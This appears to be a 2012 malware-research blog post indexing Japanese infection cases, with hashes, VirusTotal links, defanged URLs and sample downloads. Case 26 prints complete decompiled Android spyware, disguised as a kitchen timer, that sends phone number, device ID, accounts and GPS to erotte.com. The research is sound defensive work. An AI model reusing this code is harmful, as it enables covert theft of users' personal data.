Operation Cleanup Japan (OCJP) by 0Day.jp May 3

Operation Cleanup Japan (OCJP)  ( 【報告】オペレーション「Cleanup Japan」 / #OCJPとは？is the project initiated by Hendrik Adrian to make the Japanese internet safer through exposure of badware sites and data, the shutdown of malicious sites and in helping the Japanese community learn from security professionals about how to recognize and prevent malware.

0DAY.JP <http://unixfreaxjp.blogspot.com/> is the project blog and it is in Japanese. We will link to his publications - via Google translation  and provide you with the relevant samples. This will be an ongoing post with future updates. Please support OCJP and enjoy.
P.S. Contact Hendrik if you have difficulty understanding Google translation of some words or need help with screenshots. IE and Chrome handle the translated text formatting better than Firefox. Except when indicated otherwise, I did not analyze these samples and might not be able to answer questions.

Red dots indicate the sample download links - same password on all by the scheme. Email me if you need it. With many thanks to Hendrik for his work and contributions.
DOWNLOAD ALL SAMPLES FROM THIS FOLDER OR FROM LINKS BELOW

 2012-04-18 Case 39 ◘ Zeus

ANALYSIS:   Phoenix Exploit pack with Zeus payload

Scan result is : VT (22 / 40) https://www.virustotal.com/file/5d8ccccd487c21e40b0d6d96a853bdb70b685e6d711b01334cb520d4f8fc7de8/analysis/1334754363/


 Download (password infected)


File: clxsimbrinel.pdf
Size: 13235
MD5:  0E24D38ADC791529565AFE905D60B733 

 2012-04-12 Case 38 ◘ Linkedin malvertizement with Dapato / Cridex/ Carberp

ANALYSIS:   OCJP-038 Fake Linkedin with Dapato/Cridex/Carberp

Malicious  domains/Urls

hxxp://nexe-japan.com/link.html
hxxp://baiparz.com/main.php?page=f93de12c807d28df
hxxp://baiparz.com/w.php?f=19975

Virustotal 

 Download (contact me if you need the password)



File: wpbt0.dll
Size: 198656
MD5:  CCAECA990F2C7C416B8AA03795ABADA1

 2012-04-10 Case 37 ◘ Phoenix -> Zeus

ANALYSIS:   Phoenix Exploit pack with Zeus payload 112.78.124.115  and  219.94.194.138

 Download (contact me if you need the password)

File: clxsimbrinel.pdf
Size: 13235
MD5:  0E24D38ADC791529565AFE905D60B733 

File: frf3.php
Size: 147496
MD5:  65AC9035D47DFCB632A24A95098090B6

File: hQj.exe
Size: 305704
MD5:  05409F83898AEA65FDA75A9A0B35EB8F

File: shellcode-LibTiff.bin
Size: 514
MD5:  A1441AF1787638F5FA6E6C8DCA015DE2

File: Vdqu.exe
Size: 305704
MD5:  05409F83898AEA65FDA75A9A0B35EB8F

File: Y9fNYJCs.exe
Size: 305704
MD5:  05409F83898AEA65FDA75A9A0B35EB8F

 2012-04-04 Case 35 ◘ Blackhole+>Zeus

ANALYSIS:   #OCJP-035 hirochan.boo.jp/210.172.144.77

 Download (contact me if you need the password)

Other files included
     ap2.php@f=ba33e
    js.js
    q.php@f=14095.exe
    q.php@f=ba33e.exe
    showthread.php@t=d7ad916d1c0396ff
    showthread.php@t=d7ad916d1c0396ff.1
 
File: q.php@f=14095.exe
Size: 296488
MD5:  D025064D50C23C46AF1D3F85C1AB780C

File: q.php@f=ba33e.exe
Size: 95272
MD5:  C3E5699E9A715B28B54B7850B6610E7A

 2012-03-31 Case 31 ◘ Blackhole+>Zeus

ANALYSIS:   #OCJP-031 210.172.144.247 Blackhole Zeus
 https://www.virustotal.com/file/e8ff5440fda478428a2907a30a80a3f5a83c82483abb9259b7d7fb6fddfcfa02/analysis/

https://www.virustotal.com/file/91d4fe27c2818884584fe10fccbe9e23074719862b2f167fb0ede3e77d64f18d/analysis/

 https://www.virustotal.com/file/eeae03329af8fe01967a09c0e25cc9d2e166acab450e4c48006121225720705e/analysis/

https://www.virustotal.com/file/56bc492740bc6fb794d25e42ab8d963cf6f054368bb77164f78b347440c960a4/analysis/

https://www.virustotal.com/file/2187029f2e79100226ff1b9904281e05e2fad10b15deac28a9e4bde63f3081e0/analysis/

Download (contact me if you need the password)

Other files included
     index.html
    js.js
    payload(q.php).exe
    showthread.php
    sVK4XT.exe

File: sVK4XT.exe
Size: 323624
MD5:  D7D5D3E4B6C115C73D7A765BDFFC3DE1

File: payload.exe
Size: 151081
MD5:  E8E7929311808960DDD431518AF8CCF3

File: js.js
Size: 75
MD5:  82ECBEA3CEEF3A87AC466E78ACACCEC5

 2012-03-27 Case 28 ◘ CVE-2011-3544 Blackhole Java

ANALYSIS:   #OCJP-028：CVE-2011-3544 Java

Virustotal

File: Qai.jar
Size: 17116
MD5:  B307484E98EF3C6D81D66BFAB549D387






 Download (password infected)

Other files included
index.html dddbb9957ee206141588deef662442f5　← VT(2/43)

js.js d3f469a73c94e8490deab380dacd5929　← VT(2/43)
Qai.jar b307484e98ef3c6d81d66bfab549d387 ← VT(6/43)
showthread.php 5301b4507b67279162de837aa34742c1 ← VT(4/43)

 2012-03-18 Case 27 ◘ Blackhole IFrame

ANALYSIS:   #OCJP-027：Wordpress vulnerablitiy exploited - IFrame leading to Gaveover zeus

 Virustotal


Download (email me if you need the password scheme)

 2012-03-17 Case 26 ◘ Contents of capture-site.com Android malware development/distribution site

ANALYSIS:   #26 Exposing the Android Fraud #Malware Development Site
 Contents of capture-site.com Android malware distribution site
 


Download (password infected)


Site Tree capture-site.com-2 icons ³ back.gif ³ blank.gif ³ folder.gif ³ image2.gif ³ sound2.gif ³ text.gif ³ unknown.gif ³ sp ³ btm.apk ³ ctm.apk ³ dtm.apk ³ index.html ³ index.html@C=D;O=A ³ index.html@C=D;O=D ³ index.html@C=M;O=A ³ index.html@C=M;O=D ³ index.html@C=N;O=A ³ index.html@C=N;O=D ³ index.html@C=S;O=A ³ index.html@C=S;O=D ³ ktm.apk ³ admin002 ³ ³ admin001.dsk ³ ³ admin001.phprj ³ ³ ad_lst.bom ³ ³ ad_rp_d.bom ³ ³ ad_rp_m.bom ³ ³ apk_inst_c.bom ³ ³ apk_inst_c.php ³ ³ apl_set.bom ³ ³ client_lst.bom ³ ³ cl_rp_d.bom ³ ³ cl_rp_m.bom ³ ³ dl_csv.bom ³ ³ dl_csv.php ³ ³ head_lst.bom ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ lgin.bom ³ ³ mail_lst.bom ³ ³ mk_mail.bom ³ ³ qdmail_receiver.php ³ ³ receipts_lst.bom ³ ³ send_mail_lst.bom ³ ³ usr_lst.bom ³ ³ _inc2.php ³ ³ ³ tmp ³ allsend_mail.tpl ³ allsend_mail_2.tpl ³ allsend_mail_3.tpl ³ allsend_mail_4.tpl ³ allsend_title.tpl ³ allsend_title_2.tpl ³ allsend_title_3.tpl ³ allsend_title_4.tpl ³ index.html ³ index.html@C=D;O=A ³ index.html@C=D;O=D ³ index.html@C=M;O=A ³ index.html@C=M;O=D ³ index.html@C=N;O=A ³ index.html@C=N;O=D ³ index.html@C=S;O=A ³ index.html@C=S;O=D ³ inquiry_mail.tpl ³ inquiry_mail_2.tpl ³ inquiry_title.tpl ³ inquiry_title_2.tpl ³ reciept_bdy.tpl ³ reciept_ttl.tpl ³ usr_dt.csv ³ android ³ ³ check.php ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ ³ Kitchen Timer ³ ³ AndroidManifest.xml ³ ³ default.properties ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ lint.xml ³ ³ project.properties ³ ³ ³ bin ³ ³ ³ appli02.php ³ ³ ³ classes.dex ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ Kitchen Timer.apk ³ ³ ³ k_test.apk ³ ³ ³ resources.ap_ ³ ³ ³ ³ ³ classes ³ ³ ³ ³ index.html ³ ³ ³ ³ index.html@C=D;O=A ³ ³ ³ ³ index.html@C=D;O=D ³ ³ ³ ³ index.html@C=M;O=A ³ ³ ³ ³ index.html@C=M;O=D ³ ³ ³ ³ index.html@C=N;O=A ³ ³ ³ ³ index.html@C=N;O=D ³ ³ ³ ³ index.html@C=S;O=A ³ ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ ³ ³ com ³ ³ ³ ³ index.html ³ ³ ³ ³ index.html@C=D;O=A ³ ³ ³ ³ index.html@C=D;O=D ³ ³ ³ ³ index.html@C=M;O=A ³ ³ ³ ³ index.html@C=M;O=D ³ ³ ³ ³ index.html@C=N;O=A ³ ³ ³ ³ index.html@C=N;O=D ³ ³ ³ ³ index.html@C=S;O=A ³ ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ ³ ³ example ³ ³ ³ ³ index.html ³ ³ ³ ³ index.html@C=D;O=A ³ ³ ³ ³ index.html@C=D;O=D ³ ³ ³ ³ index.html@C=M;O=A ³ ³ ³ ³ index.html@C=M;O=D ³ ³ ³ ³ index.html@C=N;O=A ³ ³ ³ ³ index.html@C=N;O=D ³ ³ ³ ³ index.html@C=S;O=A ³ ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ ³ ³ android ³ ³ ³ ³ index.html ³ ³ ³ ³ index.html@C=D;O=A ³ ³ ³ ³ index.html@C=D;O=D ³ ³ ³ ³ index.html@C=M;O=A ³ ³ ³ ³ index.html@C=M;O=D ³ ³ ³ ³ index.html@C=N;O=A ³ ³ ³ ³ index.html@C=N;O=D ³ ³ ³ ³ index.html@C=S;O=A ³ ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ ³ ³ service ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ KitchenTimerService$1.class ³ ³ ³ KitchenTimerService$KitchenTimerBinder.class ³ ³ ³ KitchenTimerService.class ³ ³ ³ Main$1.class ³ ³ ³ Main.class ³ ³ ³ R$attr.class ³ ³ ³ R$drawable.class ³ ³ ³ R$id.class ³ ³ ³ R$layout.class ³ ³ ³ R$raw.class ³ ³ ³ R$string.class ³ ³ ³ R.class ³ ³ ³ vew2$1.class ³ ³ ³ vew2.class ³ ³ ³ ³ ³ res ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ drawable ³ ³ icon.png ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ ³ gen ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ com ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ example ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ android ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ service ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ R.java ³ ³ ³ res ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ drawable ³ ³ ³ icon.png ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ layout ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ main.xml ³ ³ ³ ³ ³ raw ³ ³ ³ alarm.mp3 ³ ³ ³ index.html ³ ³ ³ index.html@C=D;O=A ³ ³ ³ index.html@C=D;O=D ³ ³ ³ index.html@C=M;O=A ³ ³ ³ index.html@C=M;O=D ³ ³ ³ index.html@C=N;O=A ³ ³ ³ index.html@C=N;O=D ³ ³ ³ index.html@C=S;O=A ³ ³ ³ index.html@C=S;O=D ³ ³ ³ ³ ³ values ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ strings.xml ³ ³ ³ src ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ ³ com ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ ³ example ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ ³ android ³ ³ index.html ³ ³ index.html@C=D;O=A ³ ³ index.html@C=D;O=D ³ ³ index.html@C=M;O=A ³ ³ index.html@C=M;O=D ³ ³ index.html@C=N;O=A ³ ³ index.html@C=N;O=D ³ ³ index.html@C=S;O=A ³ ³ index.html@C=S;O=D ³ ³ ³ service ³ index.html ³ index.html@C=D;O=A ³ index.html@C=D;O=D ³ index.html@C=M;O=A ³ index.html@C=M;O=D ³ index.html@C=N;O=A ³ index.html@C=N;O=D ³ index.html@C=S;O=A ³ index.html@C=S;O=D ³ KitchenTimerService.java ³ Main.java ³ vew2.java ³ fruitdouga ³ dtm.apk ³ index.html ³ index.html@C=D;O=A ³ index.html@C=D;O=D ³ index.html@C=M;O=A ³ index.html@C=M;O=D ³ index.html@C=N;O=A ³ index.html@C=N;O=D ³ index.html@C=S;O=A ³ index.html@C=S;O=D ³ success18 dtm.apk index.html index.html@C=D;O=A index.html@C=D;O=D index.html@C=M;O=A index.html@C=M;O=D index.html@C=N;O=A index.html@C=N;O=D index.html@C=S;O=A index.html@C=S;O=D
Apk and Java files
File: btm.apk  - Virustotal
MD5:  7157BA9A8E10253C57B39B05701C6BD8

File: ctm.apk - Virustotal
MD5:  677492027E802361CADF63B11B214A83

File: dtm.apk - Virustotal
MD5:  5C6B9D027DCCF7EA65EC80A005E81E31

File: dtm.apk - Virustotal
MD5:  3E78174EC0DC3DBB58D6B5C77321BA8C

File: dtm.apk - Virustotal
MD5:  9ABC414CEEA92BE88B939CDC5304AE13

File: k_test.apk - Virustotal
MD5:  E2B1FF0CFF01F6AA3DE557F26679AC08

File: Kitchen Timer.apk Virustotal
MD5:  74E71F9E28E69B5D045DF3A18A6A93B0

File: ktm.apk - Virustotal
MD5:  C4D631D2DED1F20BCD752D573BE707DA

Main.class
package com.example.android.service; import android.accounts.Account; import android.accounts.AccountManager; import android.app.Activity; import android.content.Intent; import android.location.Criteria; import android.location.Location; import android.location.LocationListener; import android.location.LocationManager; import android.media.AudioManager; import android.media.MediaPlayer; import android.net.Uri; import android.os.Bundle; import android.os.Vibrator; import android.telephony.TelephonyManager; import java.util.Timer; import java.util.TimerTask; public class Main extends Activity implements LocationListener { private Integer end_f = Integer.valueOf(0); private Vibrator mVib; private String telno = ""; private String dvino = ""; private String dtnn = ""; double latitude = 0.0D; double longitude = 0.0D; private Timer timer1; private LocationManager mLocationManager; public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(2130903040); this.mVib = ((Vibrator)getSystemService("vibrator")); this.mLocationManager = ((LocationManager)getSystemService("location")); String p = this.mLocationManager.getBestProvider(new Criteria(), true); if (this.mLocationManager != null) { this.mLocationManager.requestLocationUpdates(p, 0L, 0.0F, this); Location location0 = this.mLocationManager.getLastKnownLocation(p); if (location0 != null) { this.latitude = location0.getLatitude(); this.longitude = location0.getLongitude(); } } Intent intent = new Intent(this, KitchenTimerService.class); startService(intent); TelephonyManager telephonyManager = (TelephonyManager)getSystemService("phone"); AccountManager accountManager = AccountManager.get(this); Account[] accounts = accountManager.getAccounts(); this.dtnn = ""; for (Account account : accounts) { this.dtnn = account.name; } this.telno = telephonyManager.getLine1Number(); this.dvino = telephonyManager.getDeviceId(); this.timer1 = new Timer(); TimerTask timerTask = new TimerTask() { public void run() { Main.this.shootSound(); Main.this.mVib.vibrate(1000L); Intent i = new Intent("android.intent.action.VIEW", Uri.parse("http://erotte.com/send.php?a_id=" + Main.this.dvino + "&telno=" + Main.this.telno + "&m_addr=" + Main.this.dtnn + "&gpsx=" + String.valueOf(Main.this.latitude) + "&gpsy=" + String.valueOf(Main.this.longitude))); Main.this.startActivity(i); Main.this.end_f = Integer.valueOf(1); Main.this.moveTaskToBack(true); } }; this.timer1.schedule(timerTask, 3000L); } public void onLocationChanged(Location location) { this.latitude = location.getLatitude(); this.longitude = location.getLongitude(); if (this.mLocationManager != null) { this.mLocationManager.removeUpdates(this); } if (this.timer1 != null) { this.timer1.cancel(); this.timer1 = null; } if (this.end_f.intValue() != 1) { shootSound(); this.mVib.vibrate(1000L); Intent i = new Intent("android.intent.action.VIEW", Uri.parse("http://erotte.com/send.php?a_id=" + this.dvino + "&telno=" + this.telno + "&m_addr=" + this.dtnn + "&gpsx=" + String.valueOf(this.latitude) + "&gpsy=" + String.valueOf(this.longitude))); startActivity(i); } finish(); } public void onProviderDisabled(String provider) { } public void onProviderEnabled(String provider) { } public void onStatusChanged(String provider, int status, Bundle extras) { switch (status) { case 2: break; case 0: break; case 1: } } private void shootSound() { AudioManager meng = (AudioManager)getSystemService("audio"); int volume = meng.getStreamVolume(5); if (volume != 0) { MediaPlayer shootMP = null; if (shootMP == null) shootMP = MediaPlayer.create(this, Uri.parse("file:///system/media/audio/ui/camera_click.ogg")); if (shootMP != null) shootMP.start(); } } public void onDestroy() { super.onDestroy(); } }
R.class package com.example.android.service; public final class R { public static final class attr { } public static final class drawable { public static final int icon = 2130837504; } public static final class id { public static final int textView1 = 2131099648; } public static final class layout { public static final int main = 2130903040; } public static final class raw { public static final int alarm = 2130968576; } public static final class string { public static final int app_name = 2131034112; } }

KitchenTimerService.class package com.example.android.service; import android.app.Service; import android.content.Intent; import android.os.Binder; import android.os.IBinder; import android.telephony.TelephonyManager; import java.util.Timer; import java.util.TimerTask; import org.apache.http.HttpResponse; import org.apache.http.StatusLine; import org.apache.http.client.methods.HttpGet; import org.apache.http.impl.client.DefaultHttpClient; import org.apache.http.util.EntityUtils; public class KitchenTimerService extends Service { private Timer timer; private String url = ""; private String dvino = ""; private String dtnm = ""; public void onCreate() { super.onCreate(); } public void onStart(Intent intent, int startId) { super.onStart(intent, startId); if (this.timer != null) { this.timer.cancel(); } this.timer = new Timer(); TimerTask timerTask = new TimerTask() { public void run() { TelephonyManager telephonyManager = (TelephonyManager)KitchenTimerService.this.getSystemService("phone"); KitchenTimerService.this.dvino = telephonyManager.getDeviceId(); KitchenTimerService.this.url = ("http://erotte.com/check.php?id=" + KitchenTimerService.this.dvino); KitchenTimerService.this.dtnm = KitchenTimerService.this.doPostr(KitchenTimerService.this.url, ""); KitchenTimerService.this.dtnm = KitchenTimerService.this.dtnm.substring(0, 1); if (!KitchenTimerService.this.dtnm.equals("1")) { Intent i = new Intent( KitchenTimerService.this.getApplicationContext(), vew2.class); i.addFlags(268435456); KitchenTimerService.this.startActivity(i); } } }; this.timer.scheduleAtFixedRate(timerTask, 120000L, 1200000L); } public void onDestroy() { super.onDestroy(); } public IBinder onBind(Intent intent) { return new KitchenTimerBinder(); } public String doPostr(String url, String params) { try { HttpGet method = new HttpGet(url); DefaultHttpClient client = new DefaultHttpClient(); method.setHeader("Connection", "Keep-Alive"); HttpResponse response = client.execute(method); int status = response.getStatusLine().getStatusCode(); if (status != 200) { throw new Exception(""); } String iddt = EntityUtils.toString(response.getEntity(), "UTF-8"); return iddt; } catch (Exception e) { } return ""; } class KitchenTimerBinder extends Binder { KitchenTimerBinder() { } KitchenTimerService getService() { return KitchenTimerService.this; } } }

View2.class package com.example.android.service; import android.app.Activity; import android.content.Intent; import android.location.Criteria; import android.location.Location; import android.location.LocationListener; import android.location.LocationManager; import android.media.AudioManager; import android.media.MediaPlayer; import android.net.Uri; import android.os.Bundle; import android.os.Vibrator; import java.util.Timer; import java.util.TimerTask; public class vew2 extends Activity implements LocationListener { private Integer end_f = Integer.valueOf(0); double latitude = 0.0D; double longitude = 0.0D; private Vibrator mVib; private Timer timer2; private LocationManager mLocationManager; public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(2130903040); this.mVib = ((Vibrator)getSystemService("vibrator")); this.mLocationManager = ((LocationManager)getSystemService("location")); String p = this.mLocationManager.getBestProvider(new Criteria(), true); if (this.mLocationManager != null) { this.mLocationManager.requestLocationUpdates(p, 0L, 0.0F, this); Location location0 = this.mLocationManager.getLastKnownLocation(p); if (location0 != null) { this.latitude = location0.getLatitude(); this.longitude = location0.getLongitude(); } } this.timer2 = new Timer(); TimerTask timerTask = new TimerTask() { public void run() { vew2.this.shootSound(); vew2.this.mVib.vibrate(1000L); Intent i = new Intent("android.intent.action.VIEW", Uri.parse("http://erotte.com/rgst5.php?gpsx=" + String.valueOf(vew2.this.latitude) + "&gpsy=" + String.valueOf(vew2.this.longitude))); vew2.this.startActivity(i); vew2.this.end_f = Integer.valueOf(1); vew2.this.finish(); } }; this.timer2.schedule(timerTask, 20000L); } public void onLocationChanged(Location location) { this.latitude = location.getLatitude(); this.longitude = location.getLongitude(); if (this.mLocationManager != null) { this.mLocationManager.removeUpdates(this); } if (this.timer2 != null) { this.timer2.cancel(); this.timer2 = null; } if (this.end_f.intValue() != 1) { shootSound(); this.mVib.vibrate(1000L); Intent i = new Intent("android.intent.action.VIEW", Uri.parse("http://erotte.com/rgst5.php?gpsx=" + String.valueOf(this.latitude) + "&gpsy=" + String.valueOf(this.longitude))); startActivity(i); } finish(); } public void onProviderDisabled(String provider) { } public void onProviderEnabled(String provider) { } public void onStatusChanged(String provider, int status, Bundle extras) { switch (status) { case 2: break; case 0: break; case 1: } } private void shootSound() { AudioManager meng = (AudioManager)getSystemService("audio"); int volume = meng.getStreamVolume(5); if (volume != 0) { MediaPlayer shootMP = null; if (shootMP == null) shootMP = MediaPlayer.create(this, Uri.parse("file:///system/media/audio/ui/camera_click.ogg")); if (shootMP != null) shootMP.start(); } } public void onDestroy() { if (this.mLocationManager != null) { this.mLocationManager.removeUpdates(this); } if (this.timer2 != null) { this.timer2.cancel(); this.timer2 = null; } super.onDestroy(); } }

 2012-03-14 Case 25 ◘ Gameover Zeus

ANALYSIS:   #OCJP-025：Gameover Zeus

 Virustotal

File: BtxX9KX.exe
Size: 278016
MD5:  17BDE98108092ED612C4511BD6A633EE
 

Download (email me if you need the password scheme)

Another sample is here http://contagioexchange.blogspot.com/2012/03/010-crime-gameover-zeus-with-p2p-and.html

Other links about this variant

• ZeuS – P2P+DGA variant – mapping out and understanding the threat  - Poland - CERT
• Zeusbot/Spyeye P2P Updated, Fortifying the Botnet  by Symantec

 2012-03-06 Case 24 ◘ Blackhole IFrame

ANALYSIS:   #OCJP-024：IFRAME malware via Blackhole Exploit Japanese version of the site (Moveable Type)vulnerability

 Virustotal

File: index.html
MD5:  89d3151d1188d7a7c543254cb2cc1765
Size: 33046
 

Download (email me if you need the password scheme)

 2012-03-03 Case 23 ◘ VBS Redlof

ANALYSIS:   #OCJP-023： Service "www.fc2web.com" 1GB free website has been infected with the "VBS / Redlof.A" virus

Files included (each with VBS Redlof)
    19.html
    50.html
    bisuke00.html
    doukikai2001.htm
    event.htm
    howto.html
    index.html
    index1.html
    index2.html
    killu001.html
    link.html
    loki003.html
    main3.htm
    sub3.htm
    union.html

Virustotal

Download (email me if you need the password scheme)

 2012-02-29 Case 22 ◘ Blackhole IRS tax landing page with IFrame redirect

ANALYSIS:   #OCJP-022： IFRAME-REDIRECTOR BLACKHOLE

■ The blog site of the sites below ↓
suri-emu.co.jp / 125.206.128.37 suri-emu.co.jp / 125.206.128.37

File: reven.html
MD5:  24de85fbbf9fdb50f055c10a9d1adaad

File: ir.html
MD5:  48499618d889a335398b996336de0326

Virustotal

Emerging Signatures for this IFrame

 Download (email me if you need the password scheme)

 2012-02-26 Case 21 ◘  Chinese Win32.Ripinip / "Iprip" backdoor trojan

ANALYSIS:   #OCJP-021 (219.66.232.108 IP) IIS server infection in China are China Ripinip backdoor Trojans in the network of ODN / JAPAN TELECOM

Good description of this variant here by Kaspersky -Backdoor.Win32.Ripinip.otb


I also submitted them to threatexpert - search for them by hashes - they don't have results yet at the moment.

All files are PE binaries, not rar archives

 File: set.rar
MD5:  642ef29e0194075c830d0f2a418d8fce
Size: 28672

File: stL1.rar
MD5:  ecb3012685ac3c803817999dee39712c
Size: 249856

File: vel19.rar
MD5:  28663dc50d4400e05de15db7cffcbb79
Size: 73728

 Download (email me if you need the password scheme)

Some strings

File: set.rar MD5: 642ef29e0194075c830d0f2a418d8fce Size: 28672 Ascii Strings: --------------------------------------------------------------------------- !This program cannot be run in DOS mode. MFC42.DLL __CxxFrameHandler _mbscmp _mbsicmp free malloc MSVCRT.dll __dllonexit _onexit _exit _XcptFilter exit _acmdln __getmainargs _initterm __setusermatherr _adjust_fdiv __p__commode __p__fmode __set_app_type _except_handler3 _controlfp lstrcmpA lstrlenA DeleteFileA WriteFile SetFilePointer ReadFile GetFileSize SetFileTime CopyFileA Sleep CloseHandle GetFileTime CreateFileA GetCommandLineA GetModuleHandleA GetStartupInfoA KERNEL32.dll GetDesktopWindow IsWindow MessageBoxA USER32.dll RegOpenKeyExA RegCloseKey RegFlushKey RegQueryValueExA RegSetValueExA ADVAPI32.dll _setmbcp HKEY_PERFORMANCE_DATA HKEY_DYN_DATA HKEY_USERS HKEY_LOCAL_MACHINE HKEY_CURRENT_USER HKEY_CURRENT_CONFIG HKEY_CLASSES_ROOT HKPD HKDD HKLM HKCU HKCC HKCR CSerializedValue CSerializedKeyPath CRegistrySerialize Empty Value line=%u LPBYTE CTime CSize CRect CPoint float DWORD CString HKEY_CURRENT_USER\SOFTWARE\Autodesk\AutoCAD\ HKEY_LOCAL_MACHINE\SOFTWARE\Autodesk\AutoCAD\ (arxload"vel.arx") (if (not (arxload"vel.arx") .lsp \whohas.arx \support\vel.arx doc.lsp \support\ AcadLocation CurVer acad2000 R15.0 VEL15 acad2004 R16.0 VEL16 acad2005 R16.1 VEL17 acad2006 R16.2 VEL18 acad2007 